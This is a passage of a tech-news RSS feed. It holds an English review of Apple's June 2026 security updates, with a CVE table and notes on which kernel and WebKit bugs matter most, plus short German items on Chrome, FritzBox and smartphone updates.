                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>]]></content:encoded>
</item>
<item>
<title><![CDATA[The June 2026 Apple Security Update Review]]></title>
<description><![CDATA[We’re back with our look at the Apple macOS and iOS security updates. As this is a new feature for us, please let us know your feedback on the blog. For Jun 2026, Apple released 37 unique CVEs across iOS 26.5.2 / iPadOS 26.5.2, macOS Tahoe 26.5.2, Safari 26.5.2. Since Apple doesn’t provide CVSS s...]]></description>
<link>https://tsecurity.de/de/3694562/hacking/the-june-2026-apple-security-update-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694562/hacking/the-june-2026-apple-security-update-review/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:52 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">We’re back with our look at the Apple macOS and iOS security updates. As this is a new feature for us, please let us know your feedback on the blog. </p><p class="">For Jun 2026, Apple released 37 unique CVEs across iOS 26.5.2 / iPadOS 26.5.2, macOS Tahoe 26.5.2, Safari 26.5.2. Since Apple doesn’t provide CVSS scores or other severity information, we’re left to speculate on which of these bugs is the most severe. The overwhelming majority (31 of 37) are WebKit/WebRTC bugs reachable through malicious web content. Most of those are crash/DoS bugs rather than code execution, so the real risk lives in the small set of kernel bugs and the handful of WebKit sandbox escapes. However, there are a couple that stand out.</p><p class="">-    <strong>CVE-2026-43724 (Kernel)</strong> – According to Apple, “An app may be able to cause unexpected system termination or write kernel memory.” A kernel memory write is the highest-value primitive here: it's the privilege-escalation half of a full exploit chain and leads to complete device control. The bug was credited to Hyunwoo Kim (@v4bel), who is known to be a serious kernel researcher. </p><p class="">-    <strong>CVE-2026-39868 (Kernel)</strong> – Another kernel bug, this one could “cause unexpected system termination or corrupt kernel memory.” This is kernel memory corruption, and notably credited to a roster of elite offensive researchers (STAR Labs, Positive Technologies, Baidu Security). This kind of attribution usually signals a weaponizable, possibly Pwn2Own-grade bug rather than a theoretical crash.</p><p class="">-    <strong>CVE-2026-43725 / CVE-2026-43701 (WebKit)</strong> – Apple states these bugs could allow a website to process restricted web content outside the sandbox. I'm flagging this sandbox-escape pair over the many WebKit crash bugs because a sandbox escape is the bridge that turns a web-content bug into a path toward the kernel issues above. It's the most dangerous remotely-triggered class in the release.</p><p class="">Here’s a look at all the bugs released by Apple this month:</p>





















  
  




  


  
    




<title>Apple Security Update – June 29, 2026</title>



  
    
      <span class="num">37</span><span class="lbl">Total CVEs</span>
      <span class="num">22</span><span class="lbl">Denial of Service</span>
      <span class="num">7</span><span class="lbl">Information Disclosure</span>
      <span class="num">3</span><span class="lbl">Memory Corruption</span>
      <span class="num">2</span><span class="lbl">Elevation of Privilege</span>
      <span class="num">2</span><span class="lbl">Sandbox Escape</span>
      <span class="num">1</span><span class="lbl">Spoofing</span>
    

    <table>
      <caption>Apple security release — June 29, 2026. "Yes/No" indicates whether each update is affected. CVE IDs link to NVD.</caption>
      <thead>
        <tr>
          <th>CVE ID</th>
          <th>Component</th>
          <th>Impact</th>
          <th class="center">iOS 26.5.2 / iPadOS 26.5.2</th>
          <th class="center">macOS Tahoe 26.5.2</th>
          <th class="center">Safari 26.5.2</th>
        </tr>
      </thead>
      <tbody>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43743" target="_blank" rel="noopener">CVE-2026-43743</a></td>
        <td>IOGPUFamily</td>
        <td class="impact">An app may be able to cause unexpected system termination</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="no">No</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39868" target="_blank" rel="noopener">CVE-2026-39868</a></td>
        <td>Kernel</td>
        <td class="impact">An app may be able to cause unexpected system termination or corrupt kernel memory</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="no">No</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43722" target="_blank" rel="noopener">CVE-2026-43722</a></td>
        <td>Kernel</td>
        <td class="impact">An app may be able to leak sensitive kernel state</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="no">No</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43724" target="_blank" rel="noopener">CVE-2026-43724</a></td>
        <td>Kernel</td>
        <td class="impact">An app may be able to cause unexpected system termination or write kernel memory</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="no">No</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43703" target="_blank" rel="noopener">CVE-2026-43703</a></td>
        <td>libxslt</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="no">No</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43706" target="_blank" rel="noopener">CVE-2026-43706</a></td>
        <td>libxslt</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="no">No</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43704" target="_blank" rel="noopener">CVE-2026-43704</a></td>
        <td>Web Extensions</td>
        <td class="impact">A malicious web extension may be able to cause an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-39872" target="_blank" rel="noopener">CVE-2026-39872</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43663" target="_blank" rel="noopener">CVE-2026-43663</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43676" target="_blank" rel="noopener">CVE-2026-43676</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43699" target="_blank" rel="noopener">CVE-2026-43699</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43700" target="_blank" rel="noopener">CVE-2026-43700</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may disclose sensitive user information</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43701" target="_blank" rel="noopener">CVE-2026-43701</a></td>
        <td>WebKit</td>
        <td class="impact">A malicious website may be able to process restricted web content outside the sandbox</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43705" target="_blank" rel="noopener">CVE-2026-43705</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to memory corruption</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43707" target="_blank" rel="noopener">CVE-2026-43707</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43708" target="_blank" rel="noopener">CVE-2026-43708</a></td>
        <td>WebKit</td>
        <td class="impact">A malicious website may exfiltrate data cross-origin</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43709" target="_blank" rel="noopener">CVE-2026-43709</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43712" target="_blank" rel="noopener">CVE-2026-43712</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43713" target="_blank" rel="noopener">CVE-2026-43713</a></td>
        <td>WebKit</td>
        <td class="impact">Visiting a website may leak sensitive data</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43715" target="_blank" rel="noopener">CVE-2026-43715</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to memory corruption</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43716" target="_blank" rel="noopener">CVE-2026-43716</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43725" target="_blank" rel="noopener">CVE-2026-43725</a></td>
        <td>WebKit</td>
        <td class="impact">A malicious website may be able to process restricted web content outside the sandbox</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43726" target="_blank" rel="noopener">CVE-2026-43726</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43727" target="_blank" rel="noopener">CVE-2026-43727</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43731" target="_blank" rel="noopener">CVE-2026-43731</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to memory corruption</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43732" target="_blank" rel="noopener">CVE-2026-43732</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may disclose sensitive user information</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43734" target="_blank" rel="noopener">CVE-2026-43734</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43735" target="_blank" rel="noopener">CVE-2026-43735</a></td>
        <td>WebKit</td>
        <td class="impact">A malicious website may exfiltrate data cross-origin</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43740" target="_blank" rel="noopener">CVE-2026-43740</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may result in the disclosure of process memory</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43742" target="_blank" rel="noopener">CVE-2026-43742</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43745" target="_blank" rel="noopener">CVE-2026-43745</a></td>
        <td>WebKit</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43720" target="_blank" rel="noopener">CVE-2026-43720</a></td>
        <td>WebKit Canvas</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43721" target="_blank" rel="noopener">CVE-2026-43721</a></td>
        <td>WebKit Storage</td>
        <td class="impact">A malicious website may be able to silently hijack clipboard data</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-28979" target="_blank" rel="noopener">CVE-2026-28979</a></td>
        <td>WebRTC</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected process crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43717" target="_blank" rel="noopener">CVE-2026-43717</a></td>
        <td>WebRTC</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43718" target="_blank" rel="noopener">CVE-2026-43718</a></td>
        <td>WebRTC</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      <tr>
        <td class="cve"><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43746" target="_blank" rel="noopener">CVE-2026-43746</a></td>
        <td>WebRTC</td>
        <td class="impact">Processing maliciously crafted web content may lead to an unexpected Safari crash</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
        <td class="yes">Yes</td>
      </tr>
      </tbody>
    </table>
  



  
  









  <p class="">We’ll continue these macOS updates if people find them useful. Stay tuned for the regularly schedule Patch Tuesday blog covering Adobe and Microsoft.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Schlechter Empfang im Büro oder Keller? Eine einzige Handy-Einstellung löst das Problem]]></title>
<description><![CDATA[Dicke Wände, Tiefgarage, Untergeschoss und das Handy zeigt nur noch einen Balken. Dabei steckt in jedem modernen iPhone und Android-Smartphone eine Funktion, die genau dieses Problem behebt. Ihr müsst sie nur einmal aktivieren. Wir zeigen euch, wie das geht und worauf ihr dabei unbedingt achten s...]]></description>
<link>https://tsecurity.de/de/3693487/android-tipps/schlechter-empfang-im-buero-oder-keller-eine-einzige-handy-einstellung-loest-das-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693487/android-tipps/schlechter-empfang-im-buero-oder-keller-eine-einzige-handy-einstellung-loest-das-problem/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:10 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Dicke Wände, Tiefgarage, Untergeschoss und das Handy zeigt nur noch einen Balken. Dabei steckt in jedem modernen iPhone und Android-Smartphone eine Funktion, die genau dieses Problem behebt. Ihr müsst sie nur einmal aktivieren. Wir zeigen euch, wie das geht und worauf ihr dabei unbedingt achten solltet.]]></content:encoded>
</item>
<item>
<title><![CDATA[FritzBox: Neues Update steht bereit – es behebt einen ärgerlichen Verbindungsfehler]]></title>
<description><![CDATA[FRITZ! hat ein frisches Update veröffentlicht, das vor allem bei der Internetgeschwindigkeit helfen soll.]]></description>
<link>https://tsecurity.de/de/3691799/it-nachrichten/fritzbox-neues-update-steht-bereit-es-behebt-einen-aergerlichen-verbindungsfehler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691799/it-nachrichten/fritzbox-neues-update-steht-bereit-es-behebt-einen-aergerlichen-verbindungsfehler/</guid>
<pubDate>Fri, 24 Jul 2026 16:45:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FRITZ! hat ein frisches Update veröffentlicht, das vor allem bei der Internetgeschwindigkeit helfen soll.]]></content:encoded>
</item>
<item>
<title><![CDATA[Update dringend empfohlen: Stable-Update behebt vier Sicherheitslücken in Google Chrome]]></title>
<description><![CDATA[Google hat vier Sicherheitslücken in Chrome geschlossen, die das Unternehmen jeweils mit einem hohen Gefährdungspotenzial einstuft und die verschiedene Bereiche des Browsers betreffen. Das Einspielen des Updates wird daher dringend empfohlen, die bereinigten Versionen stehen ab sofort bereit.]]></description>
<link>https://tsecurity.de/de/3691278/it-nachrichten/update-dringend-empfohlen-stable-update-behebt-vier-sicherheitsluecken-in-google-chrome/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691278/it-nachrichten/update-dringend-empfohlen-stable-update-behebt-vier-sicherheitsluecken-in-google-chrome/</guid>
<pubDate>Fri, 24 Jul 2026 12:33:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://pics.computerbase.de/1/2/3/9/5/6-9d92189d442f1aea/article-640x360.27edaea0.jpg"><p>Google hat vier Sicherheitslücken in Chrome geschlossen, die das Unternehmen jeweils mit einem hohen Gefährdungspotenzial einstuft und die verschiedene Bereiche des Browsers betreffen. Das Einspielen des Updates wird daher dringend empfohlen, die bereinigten Versionen stehen ab sofort bereit.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mit dem zweiten Chrome-Update der Woche schließt Google weitere Browser-Lücken]]></title>
<description><![CDATA[In den neuen Chrome-Versionen 150.0.7871.186/187 für Windows und macOS sowie 150.0.7871.186 für Linux vom 23. Juli haben die Entwickler vier Schwachstellen beseitigt. Keine der geschlossenen Lücken wird laut Google bislang für Angriffe ausgenutzt. Diese Aktualisierung folgt nur zwei Tage nach dem...]]></description>
<link>https://tsecurity.de/de/3690961/it-nachrichten/mit-dem-zweiten-chrome-update-der-woche-schliesst-google-weitere-browser-luecken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690961/it-nachrichten/mit-dem-zweiten-chrome-update-der-woche-schliesst-google-weitere-browser-luecken/</guid>
<pubDate>Fri, 24 Jul 2026 10:04:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>In den neuen Chrome-Versionen 150.0.7871.186/187 für Windows und macOS sowie 150.0.7871.186 für Linux vom 23. Juli haben die Entwickler vier Schwachstellen beseitigt. Keine der geschlossenen Lücken wird laut Google bislang für Angriffe ausgenutzt. Diese Aktualisierung folgt nur zwei Tage nach dem vorherigen Chrome-Update. Die Hersteller anderer Chromium-basierter Browser werden in Kürze nachziehen.</p>



<p>Im <a href="https://chromereleases.googleblog.com/" target="_blank" rel="noreferrer noopener">Chrome Release Blog</a> führt Daniel Yip vier beseitigte Sicherheitslücken auf, die Google alle selbst entdeckt hat. Die Schwachstellen CVE-2026-16804 bis -16807 sind als hohes Risiko ausgewiesen. Drei der vier Anfälligkeiten sind Use-after-free-Lücken (UAF) in verschiedenen Komponenten, namentlich Input, Blink und WebMCP (Web Model Context Protocol, eine Schnittstelle für „KI“-Agenten). Das Problem bei CVE-2026-16807 ist hingegen ein unzulässiger Schreibzugriff auf Speicherbereiche außerhalb der vorgesehenen Grenzen (out of bounds write) in der Codecs-Komponente.</p>



<p><a href="https://www.pcwelt.de/article/1197811/die-neuesten-sicherheits-updates.html" target="_blank" rel="noreferrer noopener">▶Die neuesten Sicherheits-Updates</a></p>



<p>Erst am 21. Juli hat Google ein Update bereitgestellt und damit <a href="https://www.pcwelt.de/article/3196305/google-behebt-hochriskante-schwachstellen-in-chrome.html" data-type="link" data-id="https://www.pcwelt.de/article/3196305/google-behebt-hochriskante-schwachstellen-in-chrome.html" target="_blank" rel="noreferrer noopener">12 Sicherheitslücken geschlossen</a>. In aller Regel aktualisiert sich Chrome automatisch, wenn eine neue Version verfügbar ist. Mit dem Menü-Eintrag <em>» Hilfe » Über Google Chrome</em> können Sie die Update-Prüfung manuell anstoßen.</p>



<p>Google hat am 23. Juli auch Chrome für Android 150.0.7871.181 veröffentlicht. In der Android-Version sind die gleichen Schwachstellen beseitigt wie in den Desktop-Ausgaben. Der Extended Stable Channel für Windows und macOS enthält nun die Chromium-Version 150.0.7871.187. Die Freigabe der Chrome-Version 151 ist für den 28. Juli geplant.</p>



<p><strong>Tipp:</strong> Unabhängig davon, dass Sie Ihren Browser stets aktuell halten, sollten Sie die Sicherheit Ihres PCs zusätzlich mit geeigneter Antivirus-Software verbessern. Gute Antivirus-Lösungen stellen wir in „<a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html" target="_blank" rel="noreferrer noopener">Die besten Antivirus-Programme im Test: So schützen Sie Ihren Windows-PC</a>“ vor. Falls Sie großen Wert auf anonymes Surfen legen, <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">sind wiederum gute VPN-Programme einen Blick wert.</a></p>



<h2 class="wp-block-heading toc">Andere Chromium-basierte Browser</h2>



<p>Die Hersteller anderer auf Chromium basierender Browser sind nun wieder gefordert, mit Updates nachzuziehen. Microsoft Edge, Brave und Vivaldi sind auf dem Sicherheitsstand vor dem zweiten Chrome-Update dieser Woche. Opera hat zwar am 23. Juli ein Bugfix-Update veröffentlicht, ist jedoch mit seiner Browser-Version 133 in puncto Sicherheit weiterhin auf einem Holzweg unterwegs. Darin ist die veraltete Chromium-Ausgabe 149.0.7827.201 vom 25. Juni verbaut und für Chromium 149 liefert Google seitdem keine Updates mehr.</p>



<div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained">
<p><strong>Chromium-basierte Browser in der Übersicht:</strong></p>



<figure class="wp-block-table is-style-stripes"><table class="has-fixed-layout"><thead><tr><th><strong>Browser</strong></th><th>Version</th><th>Chromium-Version</th><th>abgesichert?</th></tr></thead><tbody><tr><td><a href="https://www.pcwelt.de/article/1135017/google-chrome.html" target="_blank" rel="noreferrer noopener" title="Download">Google Chrome ↓</a></td><td>150.0.7871.182</td><td>150.0.7871.182</td><td>🟢</td></tr><tr><td><a href="https://www.pcwelt.de/article/1191500/brave-browser.html" target="_blank" rel="noreferrer noopener" title="Download">Brave ↓</a></td><td>1.92.143</td><td>150.0.7871.182</td><td>🟡</td></tr><tr><td>Microsoft Edge</td><td>150.0.4078.96</td><td>150.0.7871.182</td><td>🟡</td></tr><tr><td><a href="https://www.pcwelt.de/article/1082991/browser-opera.html" target="_blank" rel="noreferrer noopener" title="Download">Opera One ↓</a></td><td>133.0.5932.85</td><td>149.0.7827.201</td><td>🟠</td></tr><tr><td><a href="https://www.pcwelt.de/article/1151272/vivaldi.html" target="_blank" rel="noreferrer noopener" title="Download">Vivaldi ↓</a></td><td>8.1.4087.56 </td><td>150.0.7871.186</td><td>🟡</td></tr></tbody></table><figcaption class="wp-element-caption"><em>Chromium-basierte Browser – Stand: 23.07.2026</em></figcaption></figure>
</div></div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Für die Pixel Watch: Google behebt endlich nerviges Problem]]></title>
<description><![CDATA[Pixel Watch-Nutzer*innen beschwerten sich in letzter Zeit über ein nerviges Problem mit Express Pay. Jetzt reagiert Google.]]></description>
<link>https://tsecurity.de/de/3690921/it-nachrichten/fuer-die-pixel-watch-google-behebt-endlich-nerviges-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690921/it-nachrichten/fuer-die-pixel-watch-google-behebt-endlich-nerviges-problem/</guid>
<pubDate>Fri, 24 Jul 2026 09:33:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
